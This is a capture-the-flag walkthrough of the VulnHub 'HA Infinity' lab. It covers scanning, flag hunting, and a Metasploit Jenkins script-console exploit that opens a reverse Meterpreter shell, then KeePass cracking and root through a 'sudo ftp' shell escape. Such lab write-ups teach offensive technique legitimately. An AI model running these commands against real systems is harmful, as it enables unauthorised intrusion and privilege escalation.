HA INFINITY (VULNHUB)

LINK: https://drive.google.com/file/d/1kLXbHgdx92YRJLdRnf_EVZWEulA0MYYo/view

root@kali:~/Downloads# nmap -A 192.168.222.145
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-21 16:04 GMT
Nmap scan report for 192.168.222.145
Host is up (0.00021s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
| 256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_ 256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after: 2020-09-14T17:18:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn’t have a title (text/html;charset=utf-8).
MAC Address: 00:0C:29:2F:41:F7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.222.145

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.07 seconds

now on browser

http://192.168.222.145/

now try this

http://192.168.222.145:8080/login?from=%2F

now on terminal

root@kali:~/Downloads# dirb http://192.168.222.145

—————–
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Mon Oct 21 16:07:14 2019
URL_BASE: http://192.168.222.145/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://192.168.222.145/ —-
==> DIRECTORY: http://192.168.222.145/images/
==> DIRECTORY: http://192.168.222.145/img/
+ http://192.168.222.145/index.html (CODE:200|SIZE:3261)
+ http://192.168.222.145/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.222.145/wifi/

—- Entering directory: http://192.168.222.145/images/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.222.145/img/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—- Entering directory: http://192.168.222.145/wifi/ —-
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—————–
END_TIME: Mon Oct 21 16:07:17 2019
DOWNLOADED: 4612 – FOUND: 2

now on browser

http://192.168.222.145/img/

we can see space.jpg

http://192.168.222.145/img/space.jpg

now on terminal

root@kali:~/Downloads# exiftool space.jpg
ExifTool Version Number : 11.70
File Name : space.jpg
Directory : .
File Size : 17 kB
File Modification Date/Time : 2019:10:21 16:08:50+00:00
File Access Date/Time : 2019:10:21 16:08:50+00:00
File Inode Change Date/Time : 2019:10:21 16:08:50+00:00
File Permissions : rw-r–r–
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Comment : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
Image Width : 768
Image Height : 432
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 768×432
Megapixels : 0.332

now try to access

https://192.168.222.145/

now go to certificate section -> security -> vertified by : MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C

now try to access

https://192.168.222.145/wifi/

root@kali:~/Downloads# wget http://192.168.222.145/wifi/pwd.txt
–2019-10-21 16:19:37– http://192.168.222.145/wifi/pwd.txt
Connecting to 192.168.222.145:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 254 [text/plain]
Saving to: ‘pwd.txt’

pwd.txt 100%[===================================================================>] 254 –.-KB/s in 0s

2019-10-21 16:19:37 (49.8 MB/s) – ‘pwd.txt’ saved [254/254]

root@kali:~/Downloads# cat pwd.txt
Your Password is thanos daughter name “gam” (note it’s all lower case) plus the following
I enforced new password requirement on you … 12 characters

One uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre

root@kali:~/Downloads# crunch 12 12 -t gam,%%@@2012 -o dict.txt
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600

crunch: 100% completed generating output

Now, the other file which we found was reality.cap so while examining that file, we found wifi packets in it. So, we used aircrack-ng and used our crunch created password list to find the wifi key. And voila! We found our wifi key as shown in the image below :

key found : gamA00fe2012

now try to access

https://192.168.222.145/gamA00fe2012/realitystone.txt

output : REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}

now try to access :

https://192.168.222.145/aether.php

Upon solving the quiz, we had got the following answers with their corresponding binary value :
S.No. Questions Answers Binary Value
1. In the beginning, there are 3 infinity stones on earth. False 0
2. At the end, there are two survivors on Titan. True 1
3. Thanos already had the power stone when he first appeared. True 1
4. Tesseract contains the reality stone. False 0
5. The dwarf on Ndavellir is played by Peter Dinklage True 1
6. Red skull is the guardian of space stone. False 0
7. Thor’s new hammer is called stormbuster. False 0
8. Rocket is the only Guardian of the Galaxy to survive the snap. True 1

After solving the quiz and identifying their binary values, we had a binary string i.e. 01101001. We opened this string of binary characters through the URL and there was a hints.txt and further opened it and found text encrypted through brainfuck algorithm.

now

https://192.168.222.145/01101001/hints.txt

we get

+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. —-.
+++++ .<+++ ++++[ ->— —-< ]>— .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->– –<]> -.+++ +++++ +.— —-. –.<+ ++[->
+++<] >++++ .+.< So further, we decrypted the ciphertext and got its value as admin:avengers. Here, huge possibility is that this can be log in credentials which can be used on the log in page that we found on 8080. https://www.splitbrain.org/_static/ook/ in box : +++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. —-.
+++++ .<+++ ++++[ ->— —-< ]>— .<+++ +++[- >++++ ++<]> +++.< ++++[ ->+++ +<]>+ ++++. <++++ [->– –<]> -.+++ +++++ +.— —-. –.<+ ++[->
+++<] >++++ .+.< click on brainfuck to text we get output : admin:avengers now back to 192.168.222.145:8080 username : admin password : avengers and we are in now on terminal msf5 > use exploit/multi/http/jenkins_script_console

msf5 exploit(multi/http/jenkins_script_console) > set target 1
target => 1

msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.222.145
RHOSTS => 192.168.222.145

msf5 exploit(multi/http/jenkins_script_console) > set username admin
username => admin

msf5 exploit(multi/http/jenkins_script_console) > set password avengers
password => avengers

msf5 exploit(multi/http/jenkins_script_console) > set targeturi /
targeturi => /

msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8080
RPORT => 8080
msf5 exploit(multi/http/jenkins_script_console) > exploit

[*] Started reverse TCP handler on 192.168.222.132:4444
[*] Checking access to the script console
[*] Logging in…
[*] Using CSRF token: ‘2a236090355ef1c3c2127416c9f3bd85’ (Jenkins-Crumb style)
[*] 192.168.222.145:8080 – Sending Linux stager…
[*] Sending stage (985320 bytes) to 192.168.222.145
[*] Meterpreter session 1 opened (192.168.222.132:4444 -> 192.168.222.145:51132) at 2019-10-21 16:41:20 +0000

meterpreter >
[!] Deleting /tmp/EBLKO payload file

meterpreter > s

meterpreter > shell
Process 1379 created.
Channel 1 created.
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
jenkins@ubuntu:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/opt/script
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/arping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/core18/1144/bin/mount
/snap/core18/1144/bin/ping
/snap/core18/1144/bin/su
/snap/core18/1144/bin/umount
/snap/core18/1144/usr/bin/chfn
/snap/core18/1144/usr/bin/chsh
/snap/core18/1144/usr/bin/gpasswd
/snap/core18/1144/usr/bin/newgrp
/snap/core18/1144/usr/bin/passwd
/snap/core18/1144/usr/bin/sudo
/snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1144/usr/lib/openssh/ssh-keysign
/snap/core18/1223/bin/mount
/snap/core18/1223/bin/ping
/snap/core18/1223/bin/su
/snap/core18/1223/bin/umount
/snap/core18/1223/usr/bin/chfn
/snap/core18/1223/usr/bin/chsh
/snap/core18/1223/usr/bin/gpasswd
/snap/core18/1223/usr/bin/newgrp
/snap/core18/1223/usr/bin/passwd
/snap/core18/1223/usr/bin/sudo
/snap/core18/1223/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1223/usr/lib/openssh/ssh-keysign
/snap/core/7917/bin/mount
/snap/core/7917/bin/ping
/snap/core/7917/bin/ping6
/snap/core/7917/bin/su
/snap/core/7917/bin/umount
/snap/core/7917/usr/bin/chfn
/snap/core/7917/usr/bin/chsh
/snap/core/7917/usr/bin/gpasswd
/snap/core/7917/usr/bin/newgrp
/snap/core/7917/usr/bin/passwd
/snap/core/7917/usr/bin/sudo
/snap/core/7917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7917/usr/lib/openssh/ssh-keysign
/snap/core/7917/usr/lib/snapd/snap-confine
/snap/core/7917/usr/sbin/pppd
/snap/core/7713/bin/mount

/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd

Post Enumeration :

jenkins@ubuntu:/$ /opt/script
/opt/script
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/$

TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/$ cd /opt
cd /opt

jenkins@ubuntu:/opt$ ls
ls
morag.kdbx script

jenkins@ubuntu:/opt$

jenkins@ubuntu:/opt$ exit
exit
exit
exit
meterpreter > cd /opt
meterpreter > ls
Listing: /opt
=============

Mode Size Type Last modified Name
—- —- —- ————- —-
100644/rw-r–r– 2558 fil 2019-09-16 04:35:52 +0000 morag.kdbx
104755/rwxr-xr-x 8304 fil 2019-09-15 17:48:53 +0000 script

meterpreter > download morag.kdbx .
[*] Downloading: morag.kdbx -> ./morag.kdbx
[*] Downloaded 2.50 KiB of 2.50 KiB (100.0%): morag.kdbx -> ./morag.kdbx
[*] download : morag.kdbx -> ./morag.kdbx

root@kali:~/Downloads# python keepass.py morag.kdbx > hash

root@kali:~/Downloads# john hash

output :

Password : princesa
username : morag

root@kali:~/Downloads# keepass2 morag.kdbx > hash

master password : princesa

double click on creds ->

in note section we get

bW9yYWc6eW9uZHU=

now on another terminal

root@kali:~/Downloads# echo “bW9yYWc6eW9uZHU=” | base64 -d
morag:yondu

root@kali:~/Downloads# ssh morag@192.168.222.145
The authenticity of host ‘192.168.222.145 (192.168.222.145)’ can’t be established.
ECDSA key fingerprint is SHA256:Ue2PMJVZR7FXTGM2l6vKFTogkhrz5kPZovzO2vptgAU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘192.168.222.145’ (ECDSA) to the list of known hosts.
morag@192.168.222.145’s password: yondu
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

471 packages can be updated.
242 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2023.

▄████████ ███ ▄██████▄ ███▄▄▄▄ ▄████████ ▄████████
███ ███ ▀█████████▄ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
███ █▀ ▀███▀▀██ ███ ███ ███ ███ ███ █▀ ███ █▀
███ ███ ▀ ███ ███ ███ ███ ▄███▄▄▄ ███
▀███████████ ███ ███ ███ ███ ███ ▀▀███▀▀▀ ▀███████████
███ ███ ███ ███ ███ ███ ███ █▄ ███
▄█ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
▄████████▀ ▄████▀ ▀██████▀ ▀█ █▀ ██████████ ▄████████▀

www.hackingarticles.in

Last login: Sun Sep 15 23:13:55 2019 from 192.168.0.6

morag@ubuntu:~$

morag@ubuntu:~$ sudo -l
Matching Defaults entries for morag on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User morag may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/ftp

Privilege Escalation :

morag@ubuntu:~$ sudo ftp
ftp> !/bin/bash
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
final.txt
root@ubuntu:/root# cat final.txt
┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬ ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐ ┬ ┬┌─┐┬ ┬ ┌─┐┌─┐┬ ┬┌┐┌┌┬┐ ┌┬┐┬ ┬┌─┐ ┌─┐┬┌┐┌┌─┐┬ ┌─┐┬ ┌─┐┌─┐ ┬┬
││║ │ │││││ ┬├┬┘├─┤ │ │ ││ ├─┤ │ ││ ││││└─┐ └┬┘│ ││ │ ├┤ │ ││ ││││ ││ │ ├─┤├┤ ├┤ ││││├─┤│ ├┤ │ ├─┤│ ┬ ││
oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘ ┴ └─┘└─┘ └ └─┘└─┘┘└┘─┴┘ ┴ ┴ ┴└─┘ └ ┴┘└┘┴ ┴┴─┘ └ ┴─┘┴ ┴└─┘ oo

,g@@@@@@g,
@@@@NMMN@@@g,gggpg,
]@@@` “@@@@@@@@@@@@ ,,,,
]@@@ $@@@” “%@@@@@@@@@@g
]@@@ $@@@ ]@@@@M*”*%@@@g@@@@@@g
]@@@ $@@@ ]@@@L ]@@@@@NN@@@@g
]@@@ $@@@ ]@@@` ]@@@’ ]@@@L
]@@@ggg $@@@ ]@@@` ]@@@ $@@P
]@@@@@@L $@@@@@@ ]@@@L ]@@@ $@@P
]@@@@@ 1 “%@@@@F ‘%@@@@@W $@@@,,, $@@P
]@@@@@, $@@@L 2 ]@@@M ‘%@@@@@ ]@@@@,
,,,,]@@@@@@@g@@@@@@@, ,@@@@ 3 $@@@’ ‘%@@@
,g@@@@@@@@@@”%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4 ]@@@F
g@@@M*”””%@@@ ‘”MMMMM'”%@@@@@@@@@@@@g,,g@@@M
j@@@F ]@@@ “****’ “%@@@@@@@@P
]@@@L ]@@@ ,ggggg, ””}$@@P
]@@@L g@@@@@@ g@@@@@@@@@g j@@@ $@@P
]@@@L %NN@@@@ $@@@C ]@@@@ ]@@@L $@@P
]@@@L ‘%M” j@@@F 6 ]@@@ ]@@@L $@@P
]@@@L ‘@@@@ $@@@ ]@@@L $@@P
]@@@gg@@@@w ]@@@@ggg@@@@L ]@@@L]@@@L
%@@@@@@NM” ‘%@@@@@@@M` ;@@@M j@@@L
]@@@@ ,@@g ”` #@@@M )@@@M
]@@@L 5 $@@@ `**`,@@@@F
]@@@Wggg@@@@F ,g@@@@@`
“%@@@@@@@@@@@@@@@g ,@@@@@@@@@
‘””*%N@@@@@@@M *MF” ‘$@@@
@@@@ gg, j@@@,
$@@@` j@@@L %@@@
.@@@@ %@@@ ]@@@

SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}

@SAKSHAM DIIXT